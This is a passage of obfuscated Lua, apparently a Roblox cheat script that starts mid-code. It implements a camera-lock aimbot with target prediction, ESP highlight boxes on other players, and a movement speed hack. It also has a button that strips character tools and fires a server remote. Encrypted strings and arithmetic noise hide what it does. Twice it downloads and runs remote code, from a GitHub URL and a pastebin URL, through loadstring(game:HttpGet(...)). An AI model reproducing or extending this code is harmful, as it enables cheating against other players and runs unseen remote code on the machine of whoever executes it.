true do if (v246==(1093 -(277 + 816))) then v180=nil;v181=nil;v246=4 -3 ;end if (v246==(1184 -(1058 + 125))) then v177=1 + 1 ;break;end end end if (v177==(975 -(815 + 160))) then v178=0 -0 ;v179=nil;v177=2 -1 ;end end end end break;end if (v86==(1 + 2)) then local v134=0 -0 ;local v135;while true do if (v134==(1898 -(41 + 1857))) then v135=1893 -(1222 + 671) ;while true do if (v135==0) then v98=nil;v99=getgenv().Key;v135=1;end if (v135==1) then v100=getgenv().DisableKey;function Notify(v255)v91:SetCore(v7("\61\168\126\224\37\141\26\164\118\237\8\131\26\164\127\234","\226\110\205\16\132\107"),{[v7("\223\202\244\213\68","\33\139\163\128\185")]="Miabladi's Personal",[v7("\99\93\28\202","\190\55\56\100")]=v255,[v7("\114\186\46\31\7\234\252\88","\147\54\207\92\126\115\131")]=12 -7 });end v135=2;end if (v135==2) then if (getgenv().Loaded==true) then local v270=0;while true do if (v270==0) then Notify(v7("\44\56\56\113\2\125\6\113\60\110\77\127\1\35\48\124\9\103\77\61\58\124\9\123\9\112","\30\109\81\85\29\109"));return;end end end getgenv().Loaded=true;v135=3 -0 ;end if (v135==3) then v86=4;break;end end break;end end end if (v86==(1183 -(229 + 953))) then local v136=1774 -(1111 + 663) ;while true do if (v136==1) then v88=game:GetService(v7("\182\61\168\242\221\65\164\141\43\163","\210\228\72\198\161\184\51"));v89=game:GetService(v7("\1\70\225\27\96\222\55\74\246","\174\86\41\147\112\19"));v136=1581 -(874 + 705) ;end if (v136==(0 + 0)) then getgenv().FOVSize=38 + 17 ;v87=game:GetService(v7("\239\235\175\193\246\205\244","\147\191\135\206\184"));v136=1;end if (v136==(6 -3)) then v86=2;break;end if ((1 + 1)==v136) then v90=game:GetService(v7("\124\21\132\56\32\29\7\162\88\5","\203\59\96\237\107\69\111\113"));v91=game:GetService(v7("\23\2\173\243\37\245\197\3\3\165","\183\68\118\204\129\81\144"));v136=3;end end end if ((684 -(642 + 37))==v86) then local v137=0 + 0 ;while true do if (v137==(1 + 2)) then v86=14 -8 ;break;end if (v137==0) then function update()if (getgenv().FOV==true) then if v101 then local v271=0;while true do if (v271==(455 -(233 + 221))) then local v298=0 -0 ;while true do if (v298==(0 + 0)) then v101.Position=Vector2.new(v93.X,v93.Y + v95(v90).Y );return v101;end end end if (v271==(1541 -(718 + 823))) then v101.Radius=getgenv().FOVSize * (2 + 0) ;v101.Visible=getgenv().ShowFOV;v271=806 -(266 + 539) ;end end end end end function WTVP(v195)return v94:WorldToViewportPoint(v195);end v137=1;end if (v137==1) then function WTSP(v196)return v94.WorldToScreenPoint(v94,v196);end function getClosest()local v197;local v198=math.huge;for v218,v219 in pairs(game.Players:GetPlayers()) do local v220=0 -0 ;local v221;local v222;while true do if ((1225 -(636 + 589))==v220) then v221=v219.Character:WaitForChild(v7("\140\224\185\165\139\233\187\185\173\251\174","\220\206\143\221"))[v7("\173\51\2","\178\230\29\77\119\184\172")].Value~=true ;v222=v219.Character:FindFirstChild(v7("\210\140\43\57\85\209\219\153\53\56\88\209\219\141\62\41\86\209\219\138","\152\149\222\106\123\23"))==nil ;v220=2 -1 ;end if (v220==(1 -0)) then if ((v219~=game.Players.LocalPlayer) and v219.Character and v219.Character:FindFirstChild(v7("\245\51\251\66\187\210\47\242","\213\189\70\150\35")) and (v219.Character.Humanoid.Health~=0) and v219.Character:FindFirstChild(getgenv().AimPart) and v221 and v222) then local v285=0 + 0 ;local v286;local v287;while true do if ((0 + 0)==v285) then v286=v94:WorldToViewportPoint(v219.Character.PrimaryPart.Position);v287=(Vector2.new(v286.X,v286.Y) -Vector2.new(v93.X,v93.Y)).magnitude;v285=1;end if (v285==(1016 -(657 + 358))) then if getgenv().FOV then if ((v101.Radius>v287) and (v287<v198)) then local v343=0 -0 ;local v344;local v345;while true do if (v343==1) then while true do if (v344==(0 -0)) then v345=1187 -(1151 + 36) ;while true do if (v345==(0 + 0)) then v197=v219;v198=v287;break;end end break;end end break;end if (v343==(0 + 0)) then v344=0 -0 ;v345=nil;v343=1;end end end elseif (v287<v198) then local v346=1832 -(1552 + 280) ;local v347;while true do if (v346==(834 -(64 + 770))) then v347=0 + 0 ;while true do if (v347==(0 -0)) then v197=v219;v198=v287;break;end end break;end end end break;end end end break;end end end return v197;end v137=1 + 1 ;end if (v137==(1245 -(157 + 1086))) then v93.KeyDown:Connect(function(v199)local v200=0;while true do if (v200==(1 -0)) then if (v199==v99) then if (v96==true) then local v302=0 -0 ;local v303;local v304;while true do if (v302==(1 -0)) then while true do if (v303==0) then v304=0 -0 ;while true do if (0==v304) then v97= not v97;if v97 then local v380=819 -(599 + 220) ;while true do if (v380==0) then v98=getClosest();Notify(v7("\99\90\119\3\74\81\52\7\65\65\123\82\15","\104\47\53\20")   .. tostring(v98.Character.Humanoid.DisplayName) );break;end end elseif (v98~=nil) then v98=nil;Notify(v7("\150\66\141\19\191\4\166\72\192","\111\195\44\225\124\220"));end break;end end break;end end break;end if (v302==0) then v303=0 -0 ;v304=nil;v302=1932 -(1813 + 118) ;end end else Notify(v7("\249\79\13\127\164\168\211\6\9\96\235\165\215\82\64\118\165\170\218\74\5\119\234","\203\184\38\96\19\203"));end end if (v199==v100) then v96= not v96;end break;end if (v200==(0 + 0)) then local v256=1217 -(841 + 376) ;while true do if ((1 -0)==v256) then v200=1 + 0 ;break;end if (v256==(0 -0)) then v99=v99:lower();v100=v100:lower();v256=860 -(464 + 395) ;end end end end end);v88.RenderStepped:Connect(function()update();if (v96==true) then if (v98~=nil) then v94.CFrame=CFrame.new(v94.CFrame.p,v98.Character[getgenv().AimPart].Position + (v98.Character[getgenv().AimPart].Velocity * getgenv().Pred) );end end end);v137=7 -4 ;end end end if (v86==(1 + 1)) then local v138=0;while true do if (v138==0) then v92=v87.LocalPlayer;v93=v92:GetMouse();v138=838 -(467 + 370) ;end if (v138==(5 -2)) then v86=3 + 0 ;break;end if (v138==(6 -4)) then v96=true;v97=nil;v138=1 + 2 ;end if (v138==(2 -1)) then v94=v89.CurrentCamera;v95=v90.GetGuiInset;v138=522 -(150 + 370) ;end end end end end);v41:AddTextbox(v7("\9\180\176\45\131\58\163\201\54\168","\160\89\198\213\73\234\89\215"),v7("\24\63\229\173\144","\165\40\17\212\158"),function(v102)getgenv().Pred=v102;end);v41:AddTextbox(v7("\207\204\5\35\102\202\223\14\32\35\241","\70\133\185\104\83"),v7("\84\11\20\115","\169\100\37\36\74"),function(v104)getgenv().JumpOffset=v104;end);v41:AddDropdown(v7("\33\142\175\64\1\149\182","\48\96\231\194"),{v7("\224\95\15\41","\227\168\58\110\77\121\184\207"),v7("\83\41\178\65\191\212\120\161\73\51\176\84\129\218\99\177","\197\27\92\223\32\209\187\17"),v7("\54\79\211\254\17\107\204\233\16\80","\155\99\63\163"),v7("\174\222\182\136\171\176\141\195\178\130","\228\226\177\193\237\217")},v7("\24\191\52\227\38\132\44\244\39\191","\134\84\208\67"),false,function(v106)getgenv().AimPart=v7("\60\188\146\85\28\162","\60\115\204\230");end);v41:AddToggle(v7("\198\47\255\127\167\10\249\117\227\51\232\100\238\53\229","\16\135\90\139"),false,function(v108)getgenv().AutoPred=v108;end);local v42=v38:CreateTab(v7("\121\125\21\48","\24\52\20\102\83\46\52"));local v43=v42:CreateSector(v7("\225\28\17","\111\164\79\65\68"),v7("\202\220\133\202","\138\166\185\227\190\78"));local v44=loadstring(game:HttpGet("https://raw.githubusercontent.com/trendyylol/roblox/main/Libraries/ESP/Pikahub"))();local v44=loadstring(game:HttpGet("https://pastebin.com/raw/U2HwmEyF"))();local v45=game:GetService(v7("\251\120\196\46\87\49\10","\121\171\20\165\87\50\67"));local v46=v45.LocalPlayer;local v47=game:GetService(v7("\244\45\183\5\188\16\208\49\186\51","\98\166\88\217\86\217"));local v48={[v7("\211\197\73\62\163\210\247\244\117\4\130","\188\150\150\25\97\230")]=false,[v7("\255\186\111\61\56\232\219\132\124\10\9\238\209","\141\186\233\63\98\108")]=false,[v7("\210\226\45\187\54","\69\145\138\76\214")]=true,[v7("\83\199\136\132\172\41\83\192\133\134\173","\118\16\175\233\233\223")]=Color3.fromRGB(1209 -954 ,182 + 73 ,645 -(14 + 376) ),[v7("\168\140\52\182\253\180\73\153\133\59\168\254\138\111\142\138\54\162","\29\235\228\85\219\142\235")]=0.5 -0 ,[v7("\30\220\187\208\100\113\0\94\50\195\133\254\120\66\40\64","\50\93\180\218\189\23\46\71")]=Color3.fromRGB(0 + 0 ,0,0 + 0 )};function destroy_chams(v110)for v130,v131 in next,v110:GetChildren() do if (v131:IsA(v7("\252\165\72\73\116\221\90\202","\40\190\196\59\44\36\188")) and (v131.Transparency~=1)) then if (v131:FindFirstChild(v7("\27\73\211\163","\109\92\37\188\212\154\29")) and v131:FindFirstChild(v7("\39\231\165\206\34","\58\100\143\196\163\81"))) then v131.Glow:Destroy();v131.Chams:Destroy();end end end end v47.Heartbeat:Connect(function()if v48.ESP_Enabled then for v139,v140 in next,v45:GetPlayers() do if (v140~=v46) then if (v140.Character and v140.Character:FindFirstChild(v7("\50\87\46\162\49\70\236\10\40\77\44\183\15\72\247\26","\110\122\34\67\195\95\41\133")) and v140.Character:FindFirstChild(v7("\93\164\86\75\216\122\184\95","\182\21\209\59\42")) and (v140.Character:FindFirstChild(v7("\159\66\200\28\47\177\190\83","\222\215\55\165\125\65")).Health~=(0 + 0))) then if (v48.ESP_TeamCheck==false) then local v250=0 -0 ;local v251;local v252;while true do if (v250==0) then v251=0 + 0 ;v252=nil;v250=79 -(23 + 55) ;end if (v250==(2 -1)) then while true do if (v251==(0 + 0)) then v252=v140.Character;for v318,v319 in next,v252:GetChildren() do if (v319:IsA(v7("\14\208\213\31\194\192\255\94","\42\76\177\166\122\146\161\141")) and (v319.Transparency~=(1 + 0))) then if v48.Chams then if ( not v319:FindFirstChild(v7("\130\134\10\217","\22\197\234\101\174\25")) and  not v319:FindFirstChild(v7("\14\60\164\209\101","\230\77\84\197\188\22\207\183"))) then local v359=0 -0 ;local v360;local v361;local v362;local v363;while true do if ((0 + 0)==v359) then v360=901 -(652 + 249) ;v361=nil;v359=2 -1 ;end if (v359==(1869 -(708 + 1160))) then v362=nil;v363=nil;v359=2;end if (v359==(5 -3)) then while true do if (v360==0) then v361=0 -0 ;v362=nil;v360=1;end if (v360==1) then v363=nil;while true do if (v361==2) then local v390=27 -(10 + 17) ;while true do if (v390==(1 + 1)) then v361=1735 -(1400 + 332) ;break;end if (v390==(1 -0)) then v363.AlwaysOnTop=false;v363.ZIndex=3;v390=1910 -(242 + 1666) ;end if (v390==(0 + 0)) then v363=Instance.new(v7("\23\130\99\119\211\161\176\212\48\172\127\80\192\161\185\221\59\153","\184\85\237\27\63\178\207\212"),v319);v363.Name=v7("\47\85\6\72","\63\104\57\105");v390=1;end end end if (v361==(0 + 0)) then local v391=0 + 0 ;while true do if (v391==2) then v361=941 -(850 + 90) ;break;end if (v391==(0 -0)) then v362=Instance.new(v7("\219\27\222\212\141\175\244\57\252\53\194\243\158\175\253\48\247\0","\85\153\116\166\156\236\193\144"),v319);v362.Name=v7("\135\232\76\190\247","\96\196\128\45\211\132");v391=1;end if (v391==(1391 -(360 + 1030))) then v362.AlwaysOnTop=true;v362.ZIndex=4 + 0 ;v391=5 -3 ;end end end if (v361==(3 -0)) then v363.Adornee=v319;v363.Color3=v48.Chams_Glow_Color;v363.Size=v362.Size + Vector3.new(1661.13 -(909 + 752) ,0.13,1223.13 -(109 + 1114) ) ;break;end if (v361==(1 -0)) then v362.Adornee=v319;v362.Color3=v48.Chams_Color;v362.Transparency=v48.Chams_Transparency;v362.Size=v319.Size + Vector3.new(0.02,0.02,0.02) ;v361=1 + 1 ;end end break;end end break;end end end else destroy_chams(v252);end end end break;end end break;end end elseif (v140.Team==v46.Team) then destroy_chams(v140.Character);end else destroy_chams(v140.Character);end end end else for v141,v142 in next,v45:GetPlayers() do if ((v142~=v46) and v142.Character and v142.Character:FindFirstChild(v7("\35\146\169\69\5\136\173\64\57\136\171\80\59\134\182\80","\36\107\231\196")) and v142.Character:FindFirstChild(v7("\117\160\175\134\83\186\171\131","\231\61\213\194")) and (v142.Character:FindFirstChild(v7("\33\184\48\114\7\162\52\119","\19\105\205\93")).Health~=0)) then destroy_chams(v142.Character);end end end end);v43:AddToggle(v7("\139\7\198\132\44","\95\201\104\190\225"),false,function(v111)getgenv().PikaESPSettings.Box=v111;end);v43:AddToggle(v7("\129\202\204\203","\174\207\171\161"),false,function(v113)getgenv().PikaESPSettings.Name=v113;end);v43:AddToggle(v7("\217\236\12\240\253\197\254","\183\141\158\109\147\152"),false,function(v115)getgenv().PikaESPSettings.Tracers=v115;end);local v49=v42:CreateSector(v7("\0\6\229\13\32","\108\76\105\134"),v7("\249\204\182\233\218","\174\139\165\209\129"));v49:AddButton(v7("\128\181\240\192\203\6\48\48\153\250","\24\195\211\130\161\166\99\16"),function(v117)local v118=0;local v119;local v120;local v121;local v122;local v123;local v124;while true do if (v118==(242 -(6 + 236))) then local v143=0 + 0 ;local v144;while true do if (v143==(0 + 0)) then v144=0 -0 ;while true do if (v144==(1 -0)) then v118=1134 -(1076 + 57) ;break;end if (0==v144) then local v253=0;while true do if (v253==(0 + 0)) then repeat wait();until game:IsLoaded() v119=game:service(v7("\118\15\232\53\86\4\85","\118\38\99\137\76\51"));v253=690 -(579 + 110) ;end if (v253==(1 + 0)) then v144=1;break;end end end end break;end end end if (v118==(2 + 0)) then v121=game:service(v7("\200\53\0\0\32\46\237\51\17\33\12\50\235\47\6\23","\64\157\70\101\114\105"));v122=game:service(v7("\114\189\169\208\21\82\190\174\224\21","\112\32\200\199\131"));v118=2 + 1 ;end if (v118==(411 -(174 + 233))) then v124=nil;v121.InputBegan:connect(function(v147)local v148=0 -0 ;local v149;while true do if (v148==0) then v149=0 -0 ;while true do if (v149==(0 + 0)) then if (v147.KeyCode==Enum.KeyCode.LeftBracket) then local v274=1174 -(663 + 511) ;while true do if ((0 + 0)==v274) then local v313=0;while true do if (v313==0) then Multiplier=Multiplier + 0.01 + 0 ;print(Multiplier);v313=2 -1 ;end if (v313==(1 + 0)) then v274=2 -1 ;break;end end end if (v274==(2 -1)) then wait(0.2 + 0 );while v121:IsKeyDown(Enum.KeyCode.LeftBracket) do local v320=0;while true do if (v320==(0 -0)) then wait();Multiplier=Multiplier + 0.01 + 0 ;v320=1 + 0 ;end if (v320==1) then print(Multiplier);break;end end end break;end end end if (v147.KeyCode==Enum.KeyCode.RightBracket) then local v275=0;local v276;local v277;while true do if (v275==1) then while true do if (v276==(722 -(478 + 244))) then v277=517 -(440 + 77) ;while true do if (1==v277) then wait(0.2 + 0 );while v121:IsKeyDown(Enum.KeyCode.RightBracket) do local v364=0 -0 ;local v365;while true do if (v364==(1556 -(655 + 901))) then v365=0 + 0 ;while true do if (v365==1) then print(Multiplier);break;end if (v365==(0 + 0)) then local v387=0 + 0 ;while true do if (v387==(3 -2)) then v365=1446 -(695 + 750) ;break;end if (v387==(0 -0)) then wait();Multiplier=Multiplier-0.01 ;v387=1;end end end end break;end end end break;end if (v277==(0 -0)) then local v352=0 -0 ;local v353;while true do if (v352==(351 -(285 + 66))) then v353=0 -0 ;while true do if (v353==(1310 -(682 + 628))) then Multiplier=Multiplier-(0.01 + 0) ;print(Multiplier);v353=1;end if (v353==(300 -(176 + 123))) then v277=1 + 0 ;break;end end break;end end end end break;end end break;end if (v275==0) then v276=0 + 0 ;v277=nil;v275=270 -(239 + 30) ;end end end v149=1 + 0 ;end if ((1 + 0)==v149) then if (v147.KeyCode==Enum.KeyCode.Z) then local v278=0 -0 ;local v279;while true do if (v278==(0 -0)) then v279=0;while true do if (v279==0) then v123= not v123;if (v123==true) then repeat local v354=315 -(306 + 9) ;while true do if (v354==(0 -0)) then game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame=game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame + (game.Players.LocalPlayer.Character.Humanoid.MoveDirection * Multiplier) ;game:GetService(v7("\30\69\82\139\198\185\52\37\83\89","\66\76\48\60\216\163\203")).Stepped:wait();break;end end until v123==false  end break;end end break;end end end break;end end break;end end end);break;end if (v118==(1 + 2)) then getgenv().Multiplier=0.5 + 0 ;v123=true;v118=2 + 2 ;end if ((2 -1)==v118) then local v146=1375 -(1140 + 235) ;while true do if (v146==1) then v118=2;break;end if (v146==(0 + 0)) then v120=v119.LocalPlayer;repeat wait();until v120.Character v146=1;end end end end end);v49:AddSlider(v7("\137\150\124\246\91","\68\218\230\25\147\63\174"),0 + 0 ,2 + 3 ,0,1,function(v125)getgenv().Multiplier=v125;end);v49:AddButton(v7("\142\44\65\77\187\168\106\116\89\184\237\12\122\116","\214\205\74\51\44"),function(v127)local v128=52 -(33 + 19) ;while true do if (v128==(0 + 0)) then for v150,v151 in pairs(game.Players.LocalPlayer.Character:GetChildren()) do if (v151:IsA(v7("\201\79\240\245\103\238","\23\154\44\130\156")) and (v151.Name~=v7("\57\163\172\162\34\27","\115\113\198\205\206\86")) and (v151.Name~=v7("\183\88\235\84\128","\58\228\55\158")) and v151:FindFirstChild(v7("\152\134\211\47\48\158\54\166\128\192\58","\85\212\233\176\78\92\205"))) then v151:Destroy();end end game.Players.LocalPlayer.CharacterAdded:Connect(function(v152)local v153=0;while true do if (v153==0) then repeat wait();until game.Players.LocalPlayer.Character v152.ChildAdded:Connect(function(v223)if v223:IsA(v7("\121\91\154\235\90\76","\130\42\56\232")) then local v257=0 -0 ;local v258;while true do if (v257==(0 + 0)) then v258=0 -0 ;while true do if (0==v258) then wait(0.1);if v223:FindFirstChild(v7("\198\186\39\226\76\12\233\167\45\243\84","\95\138\213\68\131\32")) then v223.LocalScript:FireServer();end break;end end break;end end end end);break;end end end);break;end end end);
